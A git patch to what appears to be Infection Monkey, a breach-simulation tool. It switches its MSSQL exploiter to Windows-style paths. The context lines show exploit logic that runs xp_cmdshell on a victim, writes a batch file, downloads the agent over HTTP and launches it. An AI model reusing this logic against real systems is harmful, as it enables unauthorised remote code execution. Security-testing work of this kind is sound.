From ea980c4594fcab6011769feb56760396ce8ed962 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 14 Jun 2022 11:32:54 -0400 Subject: [PATCH] Agent: Use PureWindowsPath in MSSQLExploiter When using PurePath, Linux agents use the wrong path separator to build Windows paths. Windows corrects this, so there's no actual issue, but it's sloppy. Using PureWindowsPath objects creates the paths with the correct separators Before: xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat" After: xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat" --- monkey/infection_monkey/exploit/mssqlexec.py | 23 +++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 453e875ca..4f9608acb 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,6 +1,5 @@ import logging -import os -from pathlib import PurePath +from pathlib import PureWindowsPath from time import sleep import pymssql @@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter): # Temporary file that saves commands for monkey's download and execution. TMP_FILE_NAME = "tmp_monkey.bat" - TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" + TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 @@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter): super().__init__() self.cursor = None self.agent_http_path = None - self.payload_file_path = os.path.join( - MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME - ) + self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME def _exploit_host(self) -> ExploiterResultData: """ @@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter): return self.exploit_result def run_payload_file(self): - file_running_command = MSSQLLimitedSizePayload(self.payload_file_path) + file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path)) return self.run_mssql_command(file_running_command) def create_temp_dir(self): @@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter): raise Exception("Couldn't execute MSSQL exploiter because payload was too long") self.run_mssql_commands(array_of_commands) - def run_monkey(self, monkey_path_on_victim: PurePath): + def run_monkey(self, monkey_path_on_victim: PureWindowsPath): monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) logger.debug( f"Launching the agent: {monkey_launch_command.prefix} -- " @@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter): self.cursor.execute(cmd) sleep(MSSQLExploiter.QUERY_BUFFER) - def upload_monkey(self, monkey_path_on_victim: PurePath): + def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) self.run_payload_file() self.add_executed_cmd(monkey_download_command.command) @@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter): ) self.run_mssql_command(tmp_dir_removal_command) - def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer: + def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_repository ) @@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def write_download_command_to_payload(self, monkey_path_on_victim: PurePath): + def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) self.run_mssql_command(monkey_download_command) return monkey_download_command - def get_monkey_launch_command(self, monkey_path_on_victim: PurePath): + def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): # Form monkey's launch command monkey_args = build_monkey_commandline( self.host, self.current_depth - 1, monkey_path_on_victim @@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter): suffix=suffix, ) - def get_monkey_download_command(self, monkey_path_on_victim: PurePath): + def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) )